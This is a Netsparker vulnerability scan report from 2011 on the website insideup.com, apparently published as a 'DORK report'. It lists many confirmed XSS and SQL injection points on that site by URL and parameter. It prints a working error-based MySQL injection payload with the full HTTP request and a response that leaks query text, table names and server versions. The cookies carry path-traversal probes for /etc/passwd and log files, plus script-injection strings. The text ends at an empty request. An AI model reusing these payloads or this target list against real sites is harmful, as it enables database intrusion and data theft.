Netsparker, Web Application Security Scanner

DORK Report, SQL Injection, XSS, insideup.com, CWE-79, CWE-89

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.insideup.com/
SCAN DATE
 4/19/2011 9:15:56 PM
REPORT DATE
 4/20/2011 6:55:18 AM
SCAN DURATION
 00:34:55

Total Requests

Average Speed

req/sec.
202
identified
174
confirmed
40
critical
5
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
20 %
IMPORTANT
75 %
LOW
3 %
INFORMATION
2 %

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/ Apache Version Disclosure No
/communitysignup.html companyName POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
password1 POST Cross-site Scripting Yes
password2 POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
receiveSpecialOfferEmail POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
termsOfService POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
refererUrl POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
pseudonym POST Cross-site Scripting Yes
emailAddress POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
companyName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
password1 POST Cross-site Scripting Yes
/contactUs.html comments POST Cross-site Scripting Yes
company POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
leadCategory POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
value POST Cross-site Scripting Yes
yourInterest POST Cross-site Scripting Yes
/css/ Directory Listing (Apache) No
/googleMap.html address GET Cross-site Scripting Yes
/index.html Cookie Not Marked As HttpOnly Yes
/js/ Forbidden Resource Yes
/openx/www/ PHP Version Disclosure No
/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/bulo00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/bulo00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/cace00/project.php iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/dima00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/dima00/project.php catId GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/fist00/project.php iusrc GET [Probable] SQL Injection No
/ppc/leadflow/hins00/project.php iusrc GET [Probable] SQL Injection No
/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/incn00/project.php catId GET [Probable] SQL Injection No
/ppc/leadflow/inco00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/inco00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lgds00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lgds00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lodi00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/lodi00/project.php catId GET SQL Injection Yes
catId GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/meac00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/meac00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/obtm00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/obtm00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/parl00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/parl00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/phsy00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/phsy00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/wede00/ nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/wede00/project.php catId GET SQL Injection Yes
iusrc GET SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
catId GET Database Error Message No
MySQL Database Identified Yes
/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/ppc/leadflow/weho00/project.php iusrc GET [Probable] SQL Injection No
/ppc/tools/ Redirect Response BODY Is Too Large Yes
/privacy.html E-mail Address Disclosure No
/selectvendors.html Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/updateCity.html city GET Cross-site Scripting Yes
/whitePapaper.html company POST Cross-site Scripting Yes
companyServices POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
iusrc POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
parentPage POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
src POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
company POST Cross-site Scripting Yes
companyServices POST Cross-site Scripting Yes
email POST Cross-site Scripting Yes
firstName POST Cross-site Scripting Yes
lastName POST Cross-site Scripting Yes
parentPage POST Cross-site Scripting Yes
phone POST Cross-site Scripting Yes
src POST Cross-site Scripting Yes
url POST Cross-site Scripting Yes
Internal Server Error Yes
SQL Injection

SQL Injection
17 TOTAL
CRITICAL
CONFIRMED
17
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3jpuhm6d0i03rre8doid216i86; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

